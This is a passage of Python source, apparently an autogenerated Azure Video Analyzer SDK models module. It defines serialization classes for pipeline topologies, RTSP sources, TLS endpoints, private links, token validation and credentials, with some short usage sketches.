'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'system_data': {'key': 'systemData', 'type': 'SystemData'},
'kind': {'key': 'kind', 'type': 'str'},
'sku': {'key': 'sku', 'type': 'Sku'},
'description': {'key': 'properties.description', 'type': 'str'},
'parameters': {'key': 'properties.parameters', 'type': '[ParameterDeclaration]'},
'sources': {'key': 'properties.sources', 'type': '[SourceNodeBase]'},
'processors': {'key': 'properties.processors', 'type': '[ProcessorNodeBase]'},
'sinks': {'key': 'properties.sinks', 'type': '[SinkNodeBase]'},
}
def __init__(
self,
**kwargs
):
super(PipelineTopology, self).__init__(**kwargs)
self.kind = kwargs['kind']
self.sku = kwargs['sku']
self.description = kwargs.get('description', None)
self.parameters = kwargs.get('parameters', None)
self.sources = kwargs.get('sources', None)
self.processors = kwargs.get('processors', None)
self.sinks = kwargs.get('sinks', None)
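# A minimal usage sketch (illustrative only): a live topology declaring one parameter that
# its nodes can reference via the "${rtspUrl}" pattern. The source and sink entries are
# elided because their concrete types (for example RtspSource and VideoSink) are built
# separately; see the RtspSource sketch further below.
#
#   topology = PipelineTopology(
#       kind="Live",
#       sku=Sku(name="Live_S1"),
#       description="Archive a single RTSP camera",
#       parameters=[ParameterDeclaration(name="rtspUrl", type="String")],
#       sources=[...],  # e.g. an RtspSource whose endpoint URL is "${rtspUrl}"
#       sinks=[...],    # e.g. a VideoSink
#   )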
class PipelineTopologyCollection(msrest.serialization.Model):
"""A collection of PipelineTopology items.
:param value: A collection of PipelineTopology items.
:type value: list[~video_analyzer.models.PipelineTopology]
:param next_link: A link to the next page of the collection (when the collection contains too
many results to return in one response).
:type next_link: str
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[PipelineTopology]'},
'next_link': {'key': '@nextLink', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(PipelineTopologyCollection, self).__init__(**kwargs)
self.value = kwargs.get('value', None)
self.next_link = kwargs.get('next_link', None)
class PipelineTopologyUpdate(ProxyResource):
"""Pipeline topology describes the processing steps to be applied when processing content for a particular outcome. The topology should be defined according to the scenario to be achieved and can be reused across many pipeline instances which share the same processing characteristics. For instance, a pipeline topology which captures content from a RTSP camera and archives the content can be reused across many different cameras, as long as the same processing is to be applied across all the cameras. Individual instance properties can be defined through the use of user-defined parameters, which allow for a topology to be parameterized. This allows individual pipelines refer to different values, such as individual cameras' RTSP endpoints and credentials. Overall a topology is composed of the following:
* Parameters: list of user defined parameters that can be references across the topology nodes.
* Sources: list of one or more data sources nodes such as an RTSP source which allows for content to be ingested from cameras.
* Processors: list of nodes which perform data analysis or transformations.
* Sinks: list of one or more data sinks which allow for data to be stored or exported to other destinations.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Fully qualified resource ID for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or
"Microsoft.Storage/storageAccounts".
:vartype type: str
:ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy
information.
:vartype system_data: ~video_analyzer.models.SystemData
:param kind: Topology kind. Possible values include: "Live", "Batch".
:type kind: str or ~video_analyzer.models.Kind
:param sku: Describes the properties of a SKU.
:type sku: ~video_analyzer.models.Sku
:param description: An optional description of the pipeline topology. It is recommended that
the expected use of the topology be described here.
:type description: str
:param parameters: List of the topology parameter declarations. Parameters declared here can be
referenced throughout the topology nodes through the use of the "${PARAMETER_NAME}" string pattern.
Parameters can have optional default values and can later be defined in individual instances of
the pipeline.
:type parameters: list[~video_analyzer.models.ParameterDeclaration]
:param sources: List of the topology source nodes. Source nodes enable external data to be
ingested by the pipeline.
:type sources: list[~video_analyzer.models.SourceNodeBase]
:param processors: List of the topology processor nodes. Processor nodes enable pipeline data
to be analyzed, processed or transformed.
:type processors: list[~video_analyzer.models.ProcessorNodeBase]
:param sinks: List of the topology sink nodes. Sink nodes allow pipeline data to be stored or
exported.
:type sinks: list[~video_analyzer.models.SinkNodeBase]
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'system_data': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'system_data': {'key': 'systemData', 'type': 'SystemData'},
'kind': {'key': 'kind', 'type': 'str'},
'sku': {'key': 'sku', 'type': 'Sku'},
'description': {'key': 'properties.description', 'type': 'str'},
'parameters': {'key': 'properties.parameters', 'type': '[ParameterDeclaration]'},
'sources': {'key': 'properties.sources', 'type': '[SourceNodeBase]'},
'processors': {'key': 'properties.processors', 'type': '[ProcessorNodeBase]'},
'sinks': {'key': 'properties.sinks', 'type': '[SinkNodeBase]'},
}
def __init__(
self,
**kwargs
):
super(PipelineTopologyUpdate, self).__init__(**kwargs)
self.kind = kwargs.get('kind', None)
self.sku = kwargs.get('sku', None)
self.description = kwargs.get('description', None)
self.parameters = kwargs.get('parameters', None)
self.sources = kwargs.get('sources', None)
self.processors = kwargs.get('processors', None)
self.sinks = kwargs.get('sinks', None)
class PrivateEndpoint(msrest.serialization.Model):
"""The Private Endpoint resource.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: The ARM identifier for Private Endpoint.
:vartype id: str
"""
_validation = {
'id': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(PrivateEndpoint, self).__init__(**kwargs)
self.id = None
class PrivateEndpointConnection(Resource):
"""The Private Endpoint Connection resource.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Fully qualified resource ID for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or
"Microsoft.Storage/storageAccounts".
:vartype type: str
:ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy
information.
:vartype system_data: ~video_analyzer.models.SystemData
:param private_endpoint: The resource of private end point.
:type private_endpoint: ~video_analyzer.models.PrivateEndpoint
:param private_link_service_connection_state: A collection of information about the state of
the connection between service consumer and provider.
:type private_link_service_connection_state:
~video_analyzer.models.PrivateLinkServiceConnectionState
:ivar provisioning_state: The provisioning state of the private endpoint connection resource.
Possible values include: "Succeeded", "Creating", "Deleting", "Failed".
:vartype provisioning_state: str or
~video_analyzer.models.PrivateEndpointConnectionProvisioningState
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'system_data': {'readonly': True},
'provisioning_state': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'system_data': {'key': 'systemData', 'type': 'SystemData'},
'private_endpoint': {'key': 'properties.privateEndpoint', 'type': 'PrivateEndpoint'},
'private_link_service_connection_state': {'key': 'properties.privateLinkServiceConnectionState', 'type': 'PrivateLinkServiceConnectionState'},
'provisioning_state': {'key': 'properties.provisioningState', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(PrivateEndpointConnection, self).__init__(**kwargs)
self.private_endpoint = kwargs.get('private_endpoint', None)
self.private_link_service_connection_state = kwargs.get('private_link_service_connection_state', None)
self.provisioning_state = None
class PrivateEndpointConnectionListResult(msrest.serialization.Model):
"""List of private endpoint connection associated with the specified storage account.
:param value: Array of private endpoint connections.
:type value: list[~video_analyzer.models.PrivateEndpointConnection]
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[PrivateEndpointConnection]'},
}
def __init__(
self,
**kwargs
):
super(PrivateEndpointConnectionListResult, self).__init__(**kwargs)
self.value = kwargs.get('value', None)
class PrivateLinkResource(Resource):
"""A private link resource.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Fully qualified resource ID for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or
"Microsoft.Storage/storageAccounts".
:vartype type: str
:ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy
information.
:vartype system_data: ~video_analyzer.models.SystemData
:ivar group_id: The private link resource group id.
:vartype group_id: str
:ivar required_members: The private link resource required member names.
:vartype required_members: list[str]
:param required_zone_names: The private link resource Private link DNS zone name.
:type required_zone_names: list[str]
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'system_data': {'readonly': True},
'group_id': {'readonly': True},
'required_members': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'system_data': {'key': 'systemData', 'type': 'SystemData'},
'group_id': {'key': 'properties.groupId', 'type': 'str'},
'required_members': {'key': 'properties.requiredMembers', 'type': '[str]'},
'required_zone_names': {'key': 'properties.requiredZoneNames', 'type': '[str]'},
}
def __init__(
self,
**kwargs
):
super(PrivateLinkResource, self).__init__(**kwargs)
self.group_id = None
self.required_members = None
self.required_zone_names = kwargs.get('required_zone_names', None)
class PrivateLinkResourceListResult(msrest.serialization.Model):
"""A list of private link resources.
:param value: Array of private link resources.
:type value: list[~video_analyzer.models.PrivateLinkResource]
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[PrivateLinkResource]'},
}
def __init__(
self,
**kwargs
):
super(PrivateLinkResourceListResult, self).__init__(**kwargs)
self.value = kwargs.get('value', None)
class PrivateLinkServiceConnectionState(msrest.serialization.Model):
"""A collection of information about the state of the connection between service consumer and provider.
:param status: Indicates whether the connection has been Approved/Rejected/Removed by the owner
of the service. Possible values include: "Pending", "Approved", "Rejected".
:type status: str or ~video_analyzer.models.PrivateEndpointServiceConnectionStatus
:param description: The reason for approval/rejection of the connection.
:type description: str
:param actions_required: A message indicating if changes on the service provider require any
updates on the consumer.
:type actions_required: str
"""
_attribute_map = {
'status': {'key': 'status', 'type': 'str'},
'description': {'key': 'description', 'type': 'str'},
'actions_required': {'key': 'actionsRequired', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(PrivateLinkServiceConnectionState, self).__init__(**kwargs)
self.status = kwargs.get('status', None)
self.description = kwargs.get('description', None)
self.actions_required = kwargs.get('actions_required', None)
class Properties(msrest.serialization.Model):
"""Metric properties.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar service_specification: The service specifications.
:vartype service_specification: ~video_analyzer.models.ServiceSpecification
"""
_validation = {
'service_specification': {'readonly': True},
}
_attribute_map = {
'service_specification': {'key': 'serviceSpecification', 'type': 'ServiceSpecification'},
}
def __init__(
self,
**kwargs
):
super(Properties, self).__init__(**kwargs)
self.service_specification = None
class ResourceIdentity(msrest.serialization.Model):
"""The user assigned managed identity to use when accessing a resource.
All required parameters must be populated in order to send to Azure.
:param user_assigned_identity: Required. The user assigned managed identity's resource
identifier to use when accessing a resource.
:type user_assigned_identity: str
"""
_validation = {
'user_assigned_identity': {'required': True},
}
_attribute_map = {
'user_assigned_identity': {'key': 'userAssignedIdentity', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(ResourceIdentity, self).__init__(**kwargs)
self.user_assigned_identity = kwargs['user_assigned_identity']
class RsaTokenKey(TokenKey):
"""Required validation properties for tokens generated with RSA algorithm.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types. Constant filled by server.
:type type: str
:param kid: Required. JWT token key id. Validation keys are looked up based on the key id
present on the JWT token header.
:type kid: str
:param alg: Required. RSA algorithm to be used: RS256, RS384 or RS512. Possible values include:
"RS256", "RS384", "RS512".
:type alg: str or ~video_analyzer.models.AccessPolicyRsaAlgo
:param n: Required. RSA public key modulus.
:type n: str
:param e: Required. RSA public key exponent.
:type e: str
"""
_validation = {
'type': {'required': True},
'kid': {'required': True},
'alg': {'required': True},
'n': {'required': True},
'e': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'kid': {'key': 'kid', 'type': 'str'},
'alg': {'key': 'alg', 'type': 'str'},
'n': {'key': 'n', 'type': 'str'},
'e': {'key': 'e', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(RsaTokenKey, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.RsaTokenKey' # type: str
self.alg = kwargs['alg']
self.n = kwargs['n']
self.e = kwargs['e']
class SourceNodeBase(NodeBase):
"""Base class for topology source nodes.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: RtspSource, VideoSource.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types. Constant filled by server.
:type type: str
:param name: Required. Node name. Must be unique within the topology.
:type name: str
"""
_validation = {
'type': {'required': True},
'name': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
}
_subtype_map = {
'type': {'#Microsoft.VideoAnalyzer.RtspSource': 'RtspSource', '#Microsoft.VideoAnalyzer.VideoSource': 'VideoSource'}
}
def __init__(
self,
**kwargs
):
super(SourceNodeBase, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.SourceNodeBase' # type: str
class RtspSource(SourceNodeBase):
"""RTSP source allows for media from an RTSP camera or generic RTSP server to be ingested into a pipeline.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types. Constant filled by server.
:type type: str
:param name: Required. Node name. Must be unique within the topology.
:type name: str
:param transport: Network transport utilized by the RTSP and RTP exchange: TCP or HTTP. When
using TCP, the RTP packets are interleaved on the TCP RTSP connection. When using HTTP, the
RTSP messages are exchanged through long-lived HTTP connections, and the RTP packets are
interleaved in the HTTP connections alongside the RTSP messages. Possible values include:
"Http", "Tcp".
:type transport: str or ~video_analyzer.models.RtspTransport
:param endpoint: Required. RTSP endpoint information for Video Analyzer to connect to. This
contains the required information for Video Analyzer to connect to RTSP cameras and/or generic
RTSP servers.
:type endpoint: ~video_analyzer.models.EndpointBase
"""
_validation = {
'type': {'required': True},
'name': {'required': True},
'endpoint': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'transport': {'key': 'transport', 'type': 'str'},
'endpoint': {'key': 'endpoint', 'type': 'EndpointBase'},
}
def __init__(
self,
**kwargs
):
super(RtspSource, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.RtspSource' # type: str
self.transport = kwargs.get('transport', None)
self.endpoint = kwargs['endpoint']
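# A minimal usage sketch (illustrative only). ``credentials`` stands for a CredentialsBase
# subclass defined elsewhere in this module, and "${rtspUrl}" refers to a declared topology
# parameter:
#
#   rtsp = RtspSource(
#       name="rtspSource",
#       transport="Tcp",
#       endpoint=TlsEndpoint(
#           url="${rtspUrl}",
#           credentials=credentials,  # a CredentialsBase subclass, e.g. username/password
#       ),
#   )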
class TunnelBase(msrest.serialization.Model):
"""Base class for tunnel objects.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: SecureIotDeviceRemoteTunnel.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types. Constant filled by server.
:type type: str
"""
_validation = {
'type': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
}
_subtype_map = {
'type': {'#Microsoft.VideoAnalyzer.SecureIotDeviceRemoteTunnel': 'SecureIotDeviceRemoteTunnel'}
}
def __init__(
self,
**kwargs
):
super(TunnelBase, self).__init__(**kwargs)
self.type = None # type: Optional[str]
class SecureIotDeviceRemoteTunnel(TunnelBase):
"""A remote tunnel securely established using IoT Hub device information.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types. Constant filled by server.
:type type: str
:param iot_hub_name: Required. Name of the IoT Hub.
:type iot_hub_name: str
:param device_id: Required. The IoT device id to use when establishing the remote tunnel. This
string is case-sensitive.
:type device_id: str
"""
_validation = {
'type': {'required': True},
'iot_hub_name': {'required': True},
'device_id': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'iot_hub_name': {'key': 'iotHubName', 'type': 'str'},
'device_id': {'key': 'deviceId', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(SecureIotDeviceRemoteTunnel, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.SecureIotDeviceRemoteTunnel' # type: str
self.iot_hub_name = kwargs['iot_hub_name']
self.device_id = kwargs['device_id']
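# A minimal usage sketch (illustrative only; the hub and device names are placeholders):
# a tunnel that lets Video Analyzer reach a camera sitting behind a firewall through its
# IoT Hub device identity.
#
#   tunnel = SecureIotDeviceRemoteTunnel(iot_hub_name="my-iot-hub", device_id="front-door-camera")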
class ServiceSpecification(msrest.serialization.Model):
"""The service metric specifications.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar log_specifications: List of log specifications.
:vartype log_specifications: list[~video_analyzer.models.LogSpecification]
:ivar metric_specifications: List of metric specifications.
:vartype metric_specifications: list[~video_analyzer.models.MetricSpecification]
"""
_validation = {
'log_specifications': {'readonly': True},
'metric_specifications': {'readonly': True},
}
_attribute_map = {
'log_specifications': {'key': 'logSpecifications', 'type': '[LogSpecification]'},
'metric_specifications': {'key': 'metricSpecifications', 'type': '[MetricSpecification]'},
}
def __init__(
self,
**kwargs
):
super(ServiceSpecification, self).__init__(**kwargs)
self.log_specifications = None
self.metric_specifications = None
class SinkNodeBase(NodeBase):
"""Base class for topology sink nodes.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: VideoSink.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types. Constant filled by server.
:type type: str
:param name: Required. Node name. Must be unique within the topology.
:type name: str
:param inputs: Required. An array of upstream node references within the topology to be used as
inputs for this node.
:type inputs: list[~video_analyzer.models.NodeInput]
"""
_validation = {
'type': {'required': True},
'name': {'required': True},
'inputs': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'inputs': {'key': 'inputs', 'type': '[NodeInput]'},
}
_subtype_map = {
'type': {'#Microsoft.VideoAnalyzer.VideoSink': 'VideoSink'}
}
def __init__(
self,
**kwargs
):
super(SinkNodeBase, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.SinkNodeBase' # type: str
self.inputs = kwargs['inputs']
class Sku(msrest.serialization.Model):
"""The SKU details.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:param name: Required. The SKU name. Possible values include: "Live_S1", "Batch_S1".
:type name: str or ~video_analyzer.models.SkuName
:ivar tier: The SKU tier. Possible values include: "Standard".
:vartype tier: str or ~video_analyzer.models.SkuTier
"""
_validation = {
'name': {'required': True},
'tier': {'readonly': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'tier': {'key': 'tier', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(Sku, self).__init__(**kwargs)
self.name = kwargs['name']
self.tier = None
class StorageAccount(msrest.serialization.Model):
"""The details about the associated storage account.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:param id: Required. The ID of the storage account resource. Video Analyzer relies on tables,
queues, and blobs. The primary storage account must be a Standard Storage account (either
Microsoft.ClassicStorage or Microsoft.Storage).
:type id: str
:param identity: A managed identity that Video Analyzer will use to access the storage account.
:type identity: ~video_analyzer.models.ResourceIdentity
:ivar status: The current status of the storage account mapping.
:vartype status: str
"""
_validation = {
'id': {'required': True},
'status': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'identity': {'key': 'identity', 'type': 'ResourceIdentity'},
'status': {'key': 'status', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(StorageAccount, self).__init__(**kwargs)
self.id = kwargs['id']
self.identity = kwargs.get('identity', None)
self.status = None
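# A minimal usage sketch (illustrative only; both resource IDs are placeholders): associate
# a storage account with the Video Analyzer account through a user-assigned managed identity.
#
#   storage = StorageAccount(
#       id="/subscriptions/<sub>/resourceGroups/<rg>/providers/Microsoft.Storage/storageAccounts/<name>",
#       identity=ResourceIdentity(
#           user_assigned_identity="/subscriptions/<sub>/resourceGroups/<rg>/providers/"
#                                  "Microsoft.ManagedIdentity/userAssignedIdentities/<identity>"
#       ),
#   )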
class SystemData(msrest.serialization.Model):
"""Metadata pertaining to creation and last modification of the resource.
:param created_by: The identity that created the resource.
:type created_by: str
:param created_by_type: The type of identity that created the resource. Possible values
include: "User", "Application", "ManagedIdentity", "Key".
:type created_by_type: str or ~video_analyzer.models.CreatedByType
:param created_at: The timestamp of resource creation (UTC).
:type created_at: ~datetime.datetime
:param last_modified_by: The identity that last modified the resource.
:type last_modified_by: str
:param last_modified_by_type: The type of identity that last modified the resource. Possible
values include: "User", "Application", "ManagedIdentity", "Key".
:type last_modified_by_type: str or ~video_analyzer.models.CreatedByType
:param last_modified_at: The timestamp of resource last modification (UTC).
:type last_modified_at: ~datetime.datetime
"""
_attribute_map = {
'created_by': {'key': 'createdBy', 'type': 'str'},
'created_by_type': {'key': 'createdByType', 'type': 'str'},
'created_at': {'key': 'createdAt', 'type': 'iso-8601'},
'last_modified_by': {'key': 'lastModifiedBy', 'type': 'str'},
'last_modified_by_type': {'key': 'lastModifiedByType', 'type': 'str'},
'last_modified_at': {'key': 'lastModifiedAt', 'type': 'iso-8601'},
}
def __init__(
self,
**kwargs
):
super(SystemData, self).__init__(**kwargs)
self.created_by = kwargs.get('created_by', None)
self.created_by_type = kwargs.get('created_by_type', None)
self.created_at = kwargs.get('created_at', None)
self.last_modified_by = kwargs.get('last_modified_by', None)
self.last_modified_by_type = kwargs.get('last_modified_by_type', None)
self.last_modified_at = kwargs.get('last_modified_at', None)
class TimeSequenceBase(msrest.serialization.Model):
"""A sequence of datetime ranges as a string.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: VideoSequenceAbsoluteTimeMarkers.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types. Constant filled by server.
:type type: str
"""
_validation = {
'type': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
}
_subtype_map = {
'type': {'#Microsoft.VideoAnalyzer.VideoSequenceAbsoluteTimeMarkers': 'VideoSequenceAbsoluteTimeMarkers'}
}
def __init__(
self,
**kwargs
):
super(TimeSequenceBase, self).__init__(**kwargs)
self.type = None # type: Optional[str]
class TlsEndpoint(EndpointBase):
"""TLS endpoint describes an endpoint that the pipeline can connect to over TLS transport (data is encrypted in transit).
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param credentials: Required. Credentials to be presented to the endpoint.
:type credentials: ~video_analyzer.models.CredentialsBase
:param url: Required. The endpoint URL for Video Analyzer to connect to.
:type url: str
:param tunnel: Describes the tunnel through which Video Analyzer can connect to the endpoint
URL. This is an optional property, typically used when the endpoint is behind a firewall.
:type tunnel: ~video_analyzer.models.TunnelBase
:param trusted_certificates: List of trusted certificate authorities when authenticating a TLS
connection. A null list designates that Azure Video Analyzer's list of trusted authorities
should be used.
:type trusted_certificates: ~video_analyzer.models.CertificateSource
:param validation_options: Validation options to use when authenticating a TLS connection. By
default, strict validation is used.
:type validation_options: ~video_analyzer.models.TlsValidationOptions
"""
_validation = {
'type': {'required': True},
'credentials': {'required': True},
'url': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'credentials': {'key': 'credentials', 'type': 'CredentialsBase'},
'url': {'key': 'url', 'type': 'str'},
'tunnel': {'key': 'tunnel', 'type': 'TunnelBase'},
'trusted_certificates': {'key': 'trustedCertificates', 'type': 'CertificateSource'},
'validation_options': {'key': 'validationOptions', 'type': 'TlsValidationOptions'},
}
def __init__(
self,
**kwargs
):
super(TlsEndpoint, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.TlsEndpoint' # type: str
self.trusted_certificates = kwargs.get('trusted_certificates', None)
self.validation_options = kwargs.get('validation_options', None)
class TlsValidationOptions(msrest.serialization.Model):
"""Options for controlling the validation of TLS endpoints.
    :param ignore_hostname: When set to 'true', the certificate subject name validation is
     skipped. Default is 'false'.
:type ignore_hostname: str
    :param ignore_signature: When set to 'true', the certificate chain trust validation is
     skipped. Default is 'false'.
:type ignore_signature: str
"""
_attribute_map = {
'ignore_hostname': {'key': 'ignoreHostname', 'type': 'str'},
'ignore_signature': {'key': 'ignoreSignature', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(TlsValidationOptions, self).__init__(**kwargs)
self.ignore_hostname = kwargs.get('ignore_hostname', None)
self.ignore_signature = kwargs.get('ignore_signature', None)
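# Illustrative sketch (hypothetical helper): relaxing TLS validation for a camera that
# presents a self-signed certificate. Note the flags are string-typed 'true'/'false'
# values, mirroring the attribute map above.
def _example_tls_validation_options():
    return TlsValidationOptions(
        ignore_hostname='true',    # skip subject name validation
        ignore_signature='false',  # still validate the certificate chain trust
    )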
class TokenClaim(msrest.serialization.Model):
"""Properties for expected token claims.
All required parameters must be populated in order to send to Azure.
:param name: Required. Name of the claim which must be present on the token.
:type name: str
:param value: Required. Expected value of the claim to be present on the token.
:type value: str
"""
_validation = {
'name': {'required': True},
'value': {'required': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'value': {'key': 'value', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(TokenClaim, self).__init__(**kwargs)
self.name = kwargs['name']
self.value = kwargs['value']
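# Illustrative sketch (hypothetical claim name and value): a claim that an incoming JWT
# must carry before Video Analyzer will accept it. Both fields are required.
def _example_token_claim():
    return TokenClaim(name='role', value='camera-operator')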
class TrackedResource(Resource):
"""The resource model definition for an Azure Resource Manager tracked top level resource which has 'tags' and a 'location'.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:ivar id: Fully qualified resource ID for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or
"Microsoft.Storage/storageAccounts".
:vartype type: str
:ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy
information.
:vartype system_data: ~video_analyzer.models.SystemData
:param tags: A set of tags. Resource tags.
:type tags: dict[str, str]
:param location: Required. The geo-location where the resource lives.
:type location: str
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'system_data': {'readonly': True},
'location': {'required': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'system_data': {'key': 'systemData', 'type': 'SystemData'},
'tags': {'key': 'tags', 'type': '{str}'},
'location': {'key': 'location', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(TrackedResource, self).__init__(**kwargs)
self.tags = kwargs.get('tags', None)
self.location = kwargs['location']
class UnsecuredEndpoint(EndpointBase):
"""Unsecured endpoint describes an endpoint that the pipeline can connect to over clear transport (no encryption in transit).
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param credentials: Required. Credentials to be presented to the endpoint.
:type credentials: ~video_analyzer.models.CredentialsBase
:param url: Required. The endpoint URL for Video Analyzer to connect to.
:type url: str
:param tunnel: Describes the tunnel through which Video Analyzer can connect to the endpoint
URL. This is an optional property, typically used when the endpoint is behind a firewall.
:type tunnel: ~video_analyzer.models.TunnelBase
"""
_validation = {
'type': {'required': True},
'credentials': {'required': True},
'url': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'credentials': {'key': 'credentials', 'type': 'CredentialsBase'},
'url': {'key': 'url', 'type': 'str'},
'tunnel': {'key': 'tunnel', 'type': 'TunnelBase'},
}
def __init__(
self,
**kwargs
):
super(UnsecuredEndpoint, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.UnsecuredEndpoint' # type: str
class UserAssignedManagedIdentity(msrest.serialization.Model):
"""The details of the user assigned managed identity used by the Video Analyzer resource.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar client_id: The client ID.
:vartype client_id: str
:ivar principal_id: The principal ID.
:vartype principal_id: str
"""
_validation = {
'client_id': {'readonly': True},
'principal_id': {'readonly': True},
}
_attribute_map = {
'client_id': {'key': 'clientId', 'type': 'str'},
'principal_id': {'key': 'principalId', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(UserAssignedManagedIdentity, self).__init__(**kwargs)
self.client_id = None
self.principal_id = None
class UsernamePasswordCredentials(CredentialsBase):
"""Username and password credentials.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param username: Required. Username to be presented as part of the credentials.
:type username: str
    :param password: Required. Password to be presented as part of the credentials. It is
     recommended that this value is parameterized as a secret string in order to prevent it
     from being returned as part of the resource on API requests.
:type password: str
"""
_validation = {
'type': {'required': True},
'username': {'required': True},
'password': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'username': {'key': 'username', 'type': 'str'},
'password': {'key': 'password', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(UsernamePasswordCredentials, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.UsernamePasswordCredentials' # type: str
self.username = kwargs['username']
self.password = kwargs['password']
